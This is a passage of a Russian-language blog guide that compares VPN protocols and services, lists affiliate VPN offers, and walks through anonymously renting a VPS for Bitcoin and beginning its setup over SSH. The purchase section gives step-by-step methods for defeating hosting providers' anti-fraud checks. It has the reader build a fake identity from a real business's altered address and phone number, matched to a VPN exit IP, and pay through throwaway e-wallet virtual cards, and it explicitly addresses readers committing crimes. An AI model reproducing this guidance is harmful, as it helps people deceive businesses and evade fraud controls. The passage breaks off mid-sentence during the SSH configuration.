  &lt;p&gt;IKEv2 — Тоже очень неплохой протокол с очень высокой степенью защиты, быстрый по скорости. Один из немногих протоколов, поддерживающий устройства Blackberry, но сам по себе поддерживает достаточно мало платформ. Этот протокол встретишь не так часто в VPN сервисах, в отличии от OpenVPN или L2TP. Исходный код не открыт, а это потенциально небезопасно.&lt;/p&gt;
  &lt;p&gt;PPTP — Этот протокол достаточно старый, один из самых первых. Быстрый по скорости и легкий в настройке, поддерживается почти всеми ОС, однако очень уязвимый и совершенно небезопасный. Несколько раз взламывался спецслужбами. Этот протокол использовать крайне не рекомендуется за исключением случаев, где вам не нужна защита. Это юзать не нужно ни в коем случае!&lt;/p&gt;
  &lt;p&gt;L2TP/IPsec — Уже лучше, чем PPTP. L2TP также поддерживается многими ОС, в том числе и мобильными и тоже достаточно прост в настройке. IPsec обеспечивает более стойкое шифрование, чем PPTP. Однако, L2TP/IPsec медленнее, чем PPTP или OpenVPN. Не обходит Фаерволлы.&lt;/p&gt;
  &lt;p&gt;SSTP — Протокол от Microsoft. SSTP с хорошим, стойким шифрованием, доступен только для операционных систем Windows. Как и OpenVPN, позволяет обходить Firewall. Проще в настройке, чем OpenVPN. Без открытого исходного кода, поэтому OpenVPN лучше.&lt;/p&gt;
  &lt;p&gt;Вывод: если есть возможность, использовать лучше только OpenVPN из-за открытого исходного кода, безопасности и относительной скорости. IKEv2 хороший протокол, безопасный, быстрый, стабильный, но с закрытым исходным кодом. L2TP/IPsec можно использовать вместо PPTP, а PPTP использовать вовсе не рекомендую. SSTP доступен только для Винды, тоже не очень рекомендую.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Бесплатные VPN vs свой VPN vs покупной VPN&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Если вам нужен VPN срочно, быстро, здесь и сейчас и у вас нет оформленной подписки на каком-то VPN-сервисе, а своего сервера нет и подавно — тогда можете воспользоваться бесплатными VPN. Но затея, конечно, сомнительная.&lt;/p&gt;
  &lt;p&gt;Идем на сайты, скачиваем конфигурационный файл OpenVPN или получаем инструкцию по подключению, если вы используете другой VPN протокол.&lt;/p&gt;
  &lt;p&gt;Конфигурационный файл OpenVPN (с расширением .ovpn) нужно «скормить» вашему OpenVPN клиенту (о клиентах я написал ниже).&lt;/p&gt;
  &lt;p&gt;В чем преимущество бесплатных VPN?&lt;/p&gt;
  &lt;p&gt;Очевидно, что сама по себе бесплатность является плюсом. Также то, что такими серверами пользуются большое количество людей, прибавляет анонимности. На этом его преимущества заканчиваются.&lt;/p&gt;
  &lt;p&gt;Данные VPN очень нестабильные. Часто отваливаются. Очень медленные. Использовать их я бы рекомендовал, только если нужно срочно для чего-то и нет других возможностей. Но лучше что бы у вас не было таких ситуаций. Не исключено, что на таких серверах ведутся логи. Да и что на этих серверах ЕЩЕ происходит — никому не известно.&lt;/p&gt;
  &lt;p&gt;Для долгосрочного использования и по важным делам использовать крайне не рекомендую.&lt;/p&gt;
  &lt;p&gt;Можно воспользоваться собственным VPN. Нужно лишь купить сервер в интернете, зайти на него и поднять там OpenVPN по инструкции.&lt;/p&gt;
  &lt;p&gt;По сравнению с платными VPN-сервисами, свой собственный VPN выходит еще дешевле. Арендовать VPS (Virtual Private Server) можно чуть ли не за 2-3$/месяц в интернете. Что, по-моему, достаточно дешево — нужно лишь поискать.&lt;/p&gt;
  &lt;p&gt;Конечно же, свой VPN имеет и другие преимущества. Например, у вас будет root-доступ к серверу, поэтому вы можете отключить логирование и 100% быть уверенными в том, что логирование не ведется. В отличии от не своего VPN (бесплатные или платные), где у вас нет root-доступа, а это значит, что вы не можете никак быть уверенны в том, что логирование отключено, как бы вас не убеждали в этом эти сервисы. Вы сам себе хозяин на сервере. Это ваш VPN.&lt;/p&gt;
  &lt;p&gt;В отличии от бесплатных VPN, свой сервер будет работать гораздо быстрее и стабильнее. Это очень весомый плюс.&lt;/p&gt;
  &lt;p&gt;Также, поскольку у вас будет свой собственный сервер, туда можно прикрутить что-нибудь помимо OpenVPN, какой-нибудь другой сервис. Например, веб-сервер и разместить там небольшой сайт. Или можно сделать ее Tor-нодой, если провайдер разрешает. Tor relay разрешают чаще чем Tor Exit Node (выходную ноду).&lt;/p&gt;
  &lt;p&gt;Однако, существует проблема, что на сервере будете находиться вы и только вы один (если вы, конечно, не дадите использовать свой VPN еще пару сотен человек, но тогда и сервер нужен будет мощнее). Такой проблемы нет у бесплатных или платных VPN.&lt;/p&gt;
  &lt;p&gt;Еще одним минусом является то, что не каждый способен поднять себе VPN. Кто-то может плохо разбираться в IT и ему эти инструкции будут казаться совершенно дикими и непонятными. А кто-то будет совершенно не понимать что он делает вообще, это тоже не хорошо. В общем, настоятельно рекомендую использовать.&lt;/p&gt;
  &lt;p&gt;Можно воспользоваться услугами платных VPN сервисов которые тоже относительно недорогие (в среднем 5-12$/месяц).&lt;/p&gt;
  &lt;p&gt;Такие сервисы нужно искать, конечно же, в интернете. Большинство из них принимают к оплате Bitcoin, что несомненно круто. У многих есть свой OpenVPN клиент под какую-то операционную систему, но пользоваться их клиентами не очень рекомендуется из соображений безопасности.&lt;/p&gt;
  &lt;p&gt;Регистрируетесь и платите за месяц (или год, что выходит дешевле), скачиваете конфигурационный файл OpenVPN (.ovpn), скармливаете его вашему OpenVPN клиенту и всё, у вас будет VPN. Если у вас не OpenVPN, то читаете инструкцию на сайте сервиса по подключению с другим протоколом. Благо на этих сайтах у них хорошие инструкции и все предельной просто и понятно.&lt;/p&gt;
  &lt;p&gt;Из преимуществ можно выделить то, что каждый сервис предлагает сервера во многих разных странах, которые доступны вам. Между этими странами можно переключаться, вручную с .ovpn конфигами или как-то автоматически, если эта фича реализована в их клиенте. Тогда как на своем собственном сервере вы привязаны к одной стране, одному IP адресу. Не понравилась одна страна — переключились на другую.&lt;/p&gt;
  &lt;p&gt;Говорить про то, что эти сервера намного стабильнее, надежнее и быстрее по сравнению с «бесплатным» решением, я думаю не нужно. Доверие к платным сервисам тоже как-то больше, чем к бесплатным VPNам, хоть все равно нет гарантий.&lt;/p&gt;
  &lt;p&gt;По сравнению со своим собственным сервером, у вас нет root-доступа, посему контролировать процессы, которые происходят внутри вы не можете. Это значит, что никаких гарантий того, что логирование отключено, у вас нет.&lt;/p&gt;
  &lt;p&gt;Когда вы выбираете себе VPN сервис или VPS, обращайте внимание на то, где зарегистрирована фирма представляющая VPN, а также на то, в каких странах расположены их сервера. Про выбор VPS тоже самое.&lt;/p&gt;
  &lt;p&gt;Юридический момент в этом деле важен, но здесь я вам не помощник. Могу сказать лишь то, что использовать VPN расположенный в стране, где вы совершаете преступление, так себе затея. Так что, если вы работаете против России, заказывать сервера в этой стране или пользоваться услугами Российского VPN сервиса КРАЙНЕ нелогично.&lt;/p&gt;
  &lt;p&gt;Выбираете сервис или VPS — смотрите где расположены сервера, где зарегистрирован сервис или хостер, читайте политику конфиденциальности.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Лучшие VPN-сервисы в 2018 году:&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Выбор редакции 2018&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/246x0w-150x150.jpg&quot; width=&quot;150&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;HideMyAss!&lt;/p&gt;
  &lt;p&gt;Наш рейтинг: 9&lt;/p&gt;
  &lt;p&gt;Прост и удобен в использовании с огромной серверной сетью и отличной поддержкой пользователей&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/http://register-now.ru/hidemyass&quot; target=&quot;_blank&quot;&gt;ПОПРОБОВАТЬ&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/vpn/hidemyass-obzor-i-otzyvy-2018/&quot; target=&quot;_blank&quot;&gt;ЧИТАТЬ ОБЗОР&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/05/cyberghost-150x150.png&quot; width=&quot;150&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;CyberGhost&lt;/p&gt;
  &lt;p&gt;Наш рейтинг: 9&lt;/p&gt;
  &lt;p&gt;Быстрый VPN-сервис с прекрасными функциями конфиденциальности&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/http://register-now.ru/cyberghost&quot; target=&quot;_blank&quot;&gt;ПОПРОБОВАТЬ&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/vpn/cyberghost-obzor-i-otzyvy-2018/&quot; target=&quot;_blank&quot;&gt;ЧИТАТЬ ОБЗОР&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2018/04/Astrill-logo-150x150.png&quot; width=&quot;150&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Astrill&lt;/p&gt;
  &lt;p&gt;Наш рейтинг: 9&lt;/p&gt;
  &lt;p&gt;VPN, обеспечивающий конфиденциальность, предлагающий разнообразную серверную сеть и большие скорости&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/http://register-now.ru/astrill&quot; target=&quot;_blank&quot;&gt;ПОПРОБОВАТЬ&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/vpn/astrill-obzor-i-otzyvy-2018/&quot; target=&quot;_blank&quot;&gt;ЧИТАТЬ ОБЗОР&lt;/a&gt;&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Ищем и арендуем VPS за Bitcoin&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Для того чтобы поднять собственный OpenVPN, нам неожиданно нужен свой сервер (далее VPS). Нужно купить VPS, зайти на него средствами SSH, произвести первичную настройку сервера (необязательно) и поднять OpenVPN.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Проблемы при анонимной покупке VPS&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Многие зарубежные компании-хостеры принимают к оплате Bitcoin. Чего не скажешь о российских сервисах, предлагающих арендовать VPS. Хотя и среди Российских можно найти с оплатой данной криптовалютой.&lt;/p&gt;
  &lt;p&gt;Однако, даже с учетом того, что «белый» хостер принимает к оплате анонимную криптовалюту, многие из них все равно не любят анонимных клиентов. Поэтому при регистрации требуют ввести такие данные как ФИО, страна, город, адрес проживания, e-mail, мобильный телефон (не всегда). Также при регистрации и последующих заходах в личный кабинет логируется ваш IP адрес. Бывают более лояльные хостеры, бывают менее. Так что достаточно просто и анонимно купить VPS получится далеко не всегда.&lt;/p&gt;
  &lt;p&gt;Казалось бы, что при регистрации можно вбить левые данные, а проблема логирования IP решается проксями или Tor Браузером. НО НЕТ! Дело в том, что у многих таких «белых» хостеров на сайтах внедрены специальные антифрод системы, которые борются с мошенническими транзакциями. Вообще-то, это защита прежде всего от кардеров, но успешно работает и против чересчур анонимных клиентов.&lt;/p&gt;
  &lt;p&gt;Антифрод система рассчитывает риск мошеннической транзации или «странного» клиента на основе очень многих факторов, которые долго и бесполезно перечислять в рамках данной статьи. В вкратце расскажу о некоторых базовых факторах, которые стоит учитывать:&lt;/p&gt;
  &lt;p&gt;1) IP адрес. Он должен быть более-менее чистый и не быть в базе антифрод системы как прокся и прочее. Это важнейший фактор. Как вы понимаете, IP адрес Tor во всех списках, и если у хостера стоит самый хуевый антифрод и есть желание бороться с анонимными клиентами, то через Tor зарегистрироватьмч не получится.&lt;/p&gt;
  &lt;p&gt;Вы можете использовать хорошие прокси или VPN. В общем, разберетесь.&lt;/p&gt;
  &lt;p&gt;2) Человек должен соответствовать реальности. Вбивать в ФИО ‘ksdjfsjd skdfkk skdgs» примерно такое — не нужно.&lt;/p&gt;
  &lt;p&gt;3) Адрес должен быть тоже реальным. Не нужно писать улица ленина, в городе залупинс в Афганистане. Ок? Также, если у вас IP российский, значит и адрес тоже должен быть российским.&lt;/p&gt;
  &lt;p&gt;4) Желательно чтобы адрес соответствовал Zip Code (индексу). В смысле, он должен принадлежать ему.&lt;/p&gt;
  &lt;p&gt;5) Телефон. Должен иметь разный вид в зависимости от страны. Если Россия, то +7901… и дальше любые цифры. Зарубежные компании (это относится, кстати, не только к хостерам), очень редко присылают смс-код на номер телефона для подтверждения регистрации или чего-то еще, в отличии от российских компаний.&lt;/p&gt;
  &lt;p&gt;В общем, все должно быть максимально правдоподобно, будто заказывает реальный, нормальных, не анонимный клиент. Но даже эти меры в каких-то случаях могут не спасти, поскольку антифрод системы бывают разные и бывают настроены по-разному.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;VPS с арендой за Bitcoin&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Аренду VPS предлагает много хостеров. Нам не нужны большие мощности, поэтому подойдут самые слабые сервера с технологией виртуализации OpenVZ (но лучше KVM или Xen) с малой процессорной мощностью и небольшим количеством оперативной памяти (256-512 mb). Стоить такие сервера могут в среднем 2-5$ в месяц. А если постараться поискать, то можно найти и за 12-18$ за целый год.&lt;/p&gt;
  &lt;p&gt;Кстати, если вы нашли VPS, который не принимает к оплате Bitcoin или у вас просто их нет, зато есть Qiwi или Яндекс Деньги, то вы можете попытаться заплатить за сервер Виртуальной Кредитной Картой (VCC — Virtual Credit Card). Эти карты можно выпустить на сайте Qiwi и Яндекс Денег соответственно. При этом, естественно, Киви и ЯД должны быть левыми. Но лучше платите Биткоинами.&lt;/p&gt;
  &lt;p&gt;Для поднятия OpenVPN нам нужно чтобы наш VPS поддерживал TUN/TAP. Обычно почти все VPS провайдеры предоставляют эту фичу. Где-то она сразу включена, как только создается VPS, где-то приходится включать через панель управления на сайте (если OpenVZ), где-то нужно просить техническую поддержку что бы включили вам TUN/TAP (но это редко).&lt;/p&gt;
  &lt;p&gt;Что бы найти VPS, нужно ввести правильный запрос в гугле. Запросы лучше делать на англ. языке, чтобы выдавал зарубежных хостеров (если нужно). Запросы могут выглядить следующим образом: «buy vps», «buy cheap vps», «cheapest vps», «cheap openvz vps», «cheap vps &amp;lt;страна&amp;gt;» и подобное.&lt;/p&gt;
  &lt;p&gt;Также существуют различные сайты, на которых можно найти достаточно дешевые VPS.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Дешевые VPS&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://lowendbox.com/&quot; target=&quot;_blank&quot;&gt;LowEndBox&lt;/a&gt; — сайт, на котором можете посмотреть дешевых VPS провайдеров.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://lowendtalk.com/&quot; target=&quot;_blank&quot;&gt;LowEndTalk&lt;/a&gt; — этот сайт существует как дополнение к предыдущему. На нем много пользователей, идет активное обсуждение разных VPS провайдеров. Сайт этот очень полезный. На нем можно найти много мелких и не очень предпринимателей, которые подторговывают VPS. Также много полезной инфы, обзоров различных хостеров и прочее. Иногда сам почитываю.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/http://lowendstock.com/&quot; target=&quot;_blank&quot;&gt;LowEndStock&lt;/a&gt; — вот здесь представлены разные дешевые хостеры VPS в таблице.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://vps-list.cryto.net&quot; target=&quot;_blank&quot;&gt;VPS-List.Cryto&lt;/a&gt; — сайт, подобный предыдущему.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://www.comparevps.com/&quot; target=&quot;_blank&quot;&gt;CompareVPS&lt;/a&gt; — еще один подобный сайт с таблицей, по-моему мнению, хуже LowEndStock.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://poiskvps.ru/&quot; target=&quot;_blank&quot;&gt;PoiskVPS.ru&lt;/a&gt; — Российский сайт по подбору VPS. Подбирать можно по разым параметрам, например таким как страна размещения сервера или способ оплаты (можно отфильтровать за биткоин, киви или что вам удобно). Полезный сайт. В основном здесь российские хостеры. Цена на VPS начитается от 70 руб./месяц.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/http://cryto.net/&quot; target=&quot;_blank&quot;&gt;Crypto.net&lt;/a&gt; — а на этом сайте, по ссылке, автор собрал и переодически обновляет список VPS провайдеров, которые принимают к оплате Bitcoin. Раньше это было более актуально, но сейчас очень большое количество провайдеров принимают Bitcoin.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://freevps.us/&quot; target=&quot;_blank&quot;&gt;FreeVPS.us&lt;/a&gt; — данный сайт может быть тоже интересен. Можно встретить каких-то VPS провайдеров дешевых. Можно найти и бесплатных или с бесплатным пробным периодом — этому сайт и посвящен.&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://helpugroup.ru/goto/https://webhostingtalk.com/&quot; target=&quot;_blank&quot;&gt;WebHostingTalk.comp&lt;/a&gt; — в дополнение. Большой форум с обсуждением провайдеров VPS/VDS, и хостингов.&lt;/p&gt;
  &lt;p&gt;На этих сайтах достаточно много информации по дешевым VPS. Заходите, читайте, находите.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Анонимно арендуем VPS за Bitcoin&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;И вот мы нашли VPS с поддержкой TUN/TAP, теперь нам нужно его арендовать. Я буду показывать аренду VPS в одном из перечисленных выше VPS провайдеров.&lt;/p&gt;
  &lt;p&gt;Мое соеденение на данным момент такое: на Хост. машине VPN + виртуалка Whonix. Поскольку я писал выше о проблемах аренды VPS через Tor, мне необходим на выходе белый (не Tor) IP.&lt;/p&gt;
  &lt;p&gt;Я иду на vpngate.net, нахожу там France в списке, скачиваю OpenVPN TCP конфиг (TCP, потому что этот VPN идет после Tor, а он только с TCP). Запускаю VPN на своем Linux (openvpn —config &amp;lt;конфиг.ovpn&amp;gt;).&lt;/p&gt;
  &lt;p&gt;Так как я выбрал France VPN, с французский IP, это значит что и мой «вирутальный клиент», тоже будет из Франции. И звать его будут никак не Вася Иванов, и жить он будет не в Красноярске.&lt;/p&gt;
  &lt;p&gt;Я захожу на сайт whoer.net для того чтобы убедиться, что IP действительно определяется из Франции. Там же была показана следующая информация: IP Фрнации, а также был указан город — Audincourt.&lt;/p&gt;
  &lt;p&gt;Вы можете тоже воспользоваться бесплатным VPN или хорошими проксями/SSH. В моем случае так получилось, что это Франция.&lt;/p&gt;
  &lt;p&gt;На сайте провайдера, я выбираю нужную мне услугу, в моем случае это VPS за 3$/месяц. Жму «Купить» или «Заказать» и меня перекидывает на страницу с конфигурацией сервера.&lt;/p&gt;
  &lt;p&gt;Так вводим какую-то информацию о сервере: Hostname, NS префиксы, пароль от root, выбираем операционную систему.&lt;/p&gt;
  &lt;p&gt;Hostname — вводим что угодно, например site.test&lt;/p&gt;
  &lt;p&gt;NS префиксы — тоже что угодно, например ns1.site.test, ns1.site.test&lt;/p&gt;
  &lt;p&gt;Пароль от root — вводим по безопаснее.&lt;/p&gt;
  &lt;p&gt;Выбираем ОС — выбирайте лучше Debian или Ubuntu (лучше Debian).&lt;/p&gt;
  &lt;p&gt;Лучше 64 бит. И самые последние доступные версии. Я выбрал Debian 8 x64. Если вы умеете работать с дистрибутивом, например CentOS, то выбирайте что душе угодно. Я все буду показывать на примере Debian.&lt;/p&gt;
  &lt;p&gt;Страница на этапе конфигурации может отличаться от провайдера к провайдеру. Поэтому не удивляйтесь, например, что вам не предложит ввести праоль от рута — значит они его сгенерируют самостоятельно и вышлют на почту.&lt;/p&gt;
  &lt;p&gt;После этого я жму Contune, затем Checkout и попадаю на страницу, где нужно вбивать данные о себе:&lt;/p&gt;
  &lt;p&gt;Имя, фамилия (придумываем сами, только не Вася Иванов)&lt;/p&gt;
  &lt;p&gt;Имейл (регаем по новой или юзаем если есть, лучше gmail, yahoo.com, hotmail, outlook, или еще что-то, У ВАС ДОЛЖЕН БЫТЬ ДОСТУП К НЕМУ)&lt;/p&gt;
  &lt;p&gt;Телефон&lt;/p&gt;
  &lt;p&gt;Адрес&lt;/p&gt;
  &lt;p&gt;Zip code&lt;/p&gt;
  &lt;p&gt;Страна (страну вы знаете по IP)&lt;/p&gt;
  &lt;p&gt;Область (раскрывающийся список из областей, на которую поделена страна)&lt;/p&gt;
  &lt;p&gt;Город (город может отображаться на том же whoer.net или других подобных сервисах, а может и не отображаться)&lt;/p&gt;
  &lt;p&gt;Пароль от аккаунта&lt;/p&gt;
  &lt;p&gt;Как сгенерировать эти данные? Ведь одно дело, когда у вас IP российский, а другое, когда другой страны, типа Франции. С Россией или Украиной в этом плане как-то проще, тут все понятно.&lt;/p&gt;
  &lt;p&gt;Для того чтобы подобрать адрес (регион страны, в котором расположен город, адрес, телефон, зип код) я воспользуют гугл картами.&lt;/p&gt;
  &lt;p&gt;А именно, я открываю Google Maps и вводжу в поиск название города, который у меня отобразился — Audincourt. Меня приблежвает к городу и карты подсвечивают его границы. Я приближаю еще немного сильнее карту и ищу какой-нибудь ОБЪЕКТ (кафе, школа, пиццерия, ресторан или еще что-то). Жму мышкой на этот объект и мне высвечивается инфорамция о нем, а именно:&lt;/p&gt;
  &lt;p&gt;Полный адрес и Zip Code, телефон (не всегда).&lt;/p&gt;
  &lt;p&gt;Для того чтобы определить область/штат/регион/провинцию, которой соответствует этот город — я просто гуглю название города и на 1-2 странице будет нужна информация.&lt;/p&gt;
  &lt;p&gt;Я копирую всю информацию и немного изменяю ее. Например, я меняю номер дома у адреса и, возможно, последние пару цифр в телефоне. Имя-фамилию я придумываю, имейл регаю или использую существующий, желательно, конечно, не Яндекс и не Майл ру. При этом, к почте у вас должен быть доступ, поскольку туда письмом придет необходимая информация. Смотрите скриншот.&lt;/p&gt;
  &lt;p&gt;Выбираю оплату Bitcoin, соглашаюсь с их правилами и жму Checkout или подобнуюю кнопку. На этом этапе начинает работать антифрод система, которая на основе факторов выше (IP, браузер, введенная информация) вычисляет так называемый Risk Score или Fraud Score, и определяет, можно тебе дальше или нельзя.&lt;/p&gt;
  &lt;p&gt;В моем случае все прошло гладко (обычно так и бывает) и меня перекинуло на страницу с информацией для оплаты bitcoin.&lt;/p&gt;
  &lt;p&gt;Там будет: число биткоинов к оплате + кошелек, куда платить. Помимо этого, этот Payment gateway (платежный шлюз) Coinfy позволяет платить не только Bitcoin но и другими криптовалютами. На все про все у вас 15 минут (без подтверждений, биткоин нужно лишь отправить). — Идем в ваш биткоин кошелек, копирует кошелек к оплате, копируем сколько битков переводить и переводим. После этого почти моментально страница с инф. к оплате изменит свой вид. — Типа, все нормально, битки идут, и перекинет вас обратно на сайт, на так называемую страницу Order Confirmation.&lt;/p&gt;
  &lt;p&gt;Еще Order Confirmation вам упадет на имейл. Помимо этого, может упасть на имейл «подтверждалка» — письмо с ссылком, при переходе по которой, вы подтверждаете свой email. Так что проверяйте.&lt;/p&gt;
  &lt;p&gt;Начался процесс создания сервера. Длится он обычно не долго. Может минут 15, может час. Ну максимум 2. Если в течении этого времени сервер не создался, то пишите в тех.поддержку, создавая тикет.&lt;/p&gt;
  &lt;p&gt;Когда VPS создатстся, вам на имейл придет письмо со всей необходимой информацией для коннета на SSH: IP адрес VPS, пароль от root.&lt;/p&gt;
  &lt;p&gt;Или эта информация будет у вас в личной кабинете на сайте. Или часть там, часть на имейл.&lt;/p&gt;
  &lt;p&gt;Также, не везде и не всегда, провайдер предоставляет доступ к VPS Contol Panel. В моем случае он предоставляет. В письме есть инфа для логина.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Заходим на сервер по SSH&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;После того, как все данные для подключения были высланы вам на почту или вы нашли их в личном кабинете, то для коннекта к серверу вы обладаете всеми данными, а именно:&lt;/p&gt;
  &lt;p&gt;IP адресс.&lt;/p&gt;
  &lt;p&gt;Логин: root.&lt;/p&gt;
  &lt;p&gt;Пароль от root: либо вы указывали при создании сервера, либо был сгенерирован.&lt;/p&gt;
  &lt;p&gt;Для того чтобы подключиться по SSH на Windows, нужно воспользоваться сторонними программами. Скачивайте на выбор: Putty или Kitty. Работать с этими программами достаточно просто.&lt;/p&gt;
  &lt;p&gt;На ОС Linux и MacOS все проще.&lt;/p&gt;
  &lt;p&gt;В терминале вводим:&lt;/p&gt;
  &lt;pre&gt;ssh user@ip
&lt;/pre&gt;
  &lt;p&gt;где: ip — IP адрес VPS.&lt;/p&gt;
  &lt;p&gt;user — username пользователя. При первом подключении / в нашем случае — root.&lt;/p&gt;
  &lt;p&gt;После нажатия enter, при самом первом коннекте, вам выскочит сообщение:&lt;/p&gt;
  &lt;p&gt;Are you sure you want to continue connecting (yes/no)?&lt;/p&gt;
  &lt;p&gt;вручную вводим yes, потом вам предложит ввести пароль от root, который у вас также есть. Если все хорошо, то вы подключились к VPS и вам будет передано управление командной строкой.&lt;/p&gt;
  &lt;p&gt;Скопировать и вставить в терминале можно так:&lt;/p&gt;
  &lt;p&gt;Если Linux, то ctrl+shift+v вставить в терминале (ctrl+shift+c скопировать из терминала).&lt;/p&gt;
  &lt;p&gt;Если Windows и вы используете Putty/Kitty, то вставить в консоль можно по нажатию на ПКМ.&lt;/p&gt;
  &lt;p&gt;Такое бывает, но иногда дистрибутив созданного сервера не совпадает с тем, который вы выбирали, когда делали заказ. Поэтому, если вы зашли на сервер по SSH и ввели команду&lt;/p&gt;
  &lt;pre&gt;apt-get update
&lt;/pre&gt;
  &lt;p&gt;Ставим нужные пакеты:&lt;/p&gt;
  &lt;pre&gt;apt-get install -y nano sudo htop curl perl python wget git openvpn openssl easy-rsa iptables ca-certificates ufw
&lt;/pre&gt;
  &lt;p&gt;где:&lt;/p&gt;
  &lt;p&gt;nano — консольный редактор. Обычно стоит изначально, но не всегда. htop — консольный диспетчер задач. openvpn — пакет openvpn. Нужно для поднятия OpenVPN. easy-rsa — скрипты для легкой генерации ключей. Нужно для поднятия OpenVPN. git — понадобится, если будете поднимать OpenVPN скриптом (далее в статье).&lt;/p&gt;
  &lt;p&gt;Еще можно поставить следующие пакеты, но не обязательно:&lt;/p&gt;
  &lt;pre&gt;apt-get install build-essential make automake autoconf pkg-config
&lt;/pre&gt;
  &lt;p&gt;Далее, нам нужно создать пользователя:&lt;/p&gt;
  &lt;pre&gt;useradd -m -s /bin/bash pp-ruloh
&lt;/pre&gt;
  &lt;p&gt;где:&lt;/p&gt;
  &lt;p&gt;useradd — команда, создающая пользователя.&lt;/p&gt;
  &lt;p&gt;-m — создает домашнюю папку пользователя (по пути /home/&amp;lt;имя пользователя&amp;gt;/), по-умолчанию имеет такое же название, как и имя пользователя&lt;/p&gt;
  &lt;p&gt;-s — указывает, какой shell использовать&lt;/p&gt;
  &lt;p&gt;pp-ruloh — имя пользователя.&lt;/p&gt;
  &lt;p&gt;После создания юзера, вам ОБЯЗАТЕЛЬНО нужно создать ему пароль, потому что мы будем использовать этого юзера для коннекта по ssh, поэтому вводим команду:&lt;/p&gt;
  &lt;pre&gt;passwd pp-ruloh
&lt;/pre&gt;
  &lt;p&gt;Предложит дважды ввести пароль. При вводе не будет отображаться. Как вставлять в терминале я писал вышел.&lt;/p&gt;
  &lt;p&gt;Далее, нужно отключить лишние сервисы. Вводим команду:&lt;/p&gt;
  &lt;pre&gt;netstat -tulpn
&lt;/pre&gt;
  &lt;p&gt;Для того что бы посмотреть, какие сервисы запущены. На данном этапе в идеале должен быть запущен только sshd. Поскольку у меня установлена Debian-minimal, то у меня так и есть и команда&lt;/p&gt;
  &lt;pre&gt;netstat -tulpn
&lt;/pre&gt;
  &lt;p&gt;Выдает:&lt;/p&gt;
  &lt;pre&gt;Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp               0.0.0.0:22              0.0.0.0:*               LISTEN      204/sshd        
tcp6              :::22                   :::*                    LISTEN      204/sshd
&lt;/pre&gt;
  &lt;p&gt;Но обычно может быть запущен какой-нибудь веб-сервер, mail-server, еще что-то… Не знаю, что запущено у вас, поэтому по-очереди вводите следующие команды:&lt;/p&gt;
  &lt;pre&gt;/etc/init.d/apache2 stop 
update-rc.d apache2 disable 
/etc/init.d/postfix stop 
update-rc.d postfix disable 
/etc/init.d/nginx stop 
update-rc.d nginx disable 
/etc/init.d/exim4 stop 
update-rc.d exim4 disable 
/etc/init.d/rpcbind stop 
update-rc.d rpcbind disable 
/etc/init.d/nfs-common stop 
update-rc.d nfs-common disable 
/etc/init.d/rsyslog stop 
update-rc.d rsyslog disable
&lt;/pre&gt;
  &lt;p&gt;Это должно отключить то, что обычно запущено уже при создании сервера.&lt;/p&gt;
  &lt;p&gt;Далее, можно настроить sshd. Из соображений безопасности поменяем порт со стандартного на нестандартный и запретим коннект от root.&lt;/p&gt;
  &lt;p&gt;Редактируем файл /etc/ssh/sshd_config при помощи nano:&lt;/p&gt;
  &lt;pre&gt;nano /etc/ssh/sshd_config
systemctl restart sshd
&lt;/pre&gt;
  &lt;p&gt;или&lt;/p&gt;
  &lt;pre&gt;service sshd restart
&lt;/pre&gt;
  &lt;p&gt;Изменения применятся.&lt;/p&gt;
  &lt;p&gt;Следующий ваш коннект по SSH будет выглядить следующим образом:&lt;/p&gt;
  &lt;pre&gt;ssh -p 1488 user@ip
&lt;/pre&gt;
  &lt;p&gt;где:&lt;/p&gt;
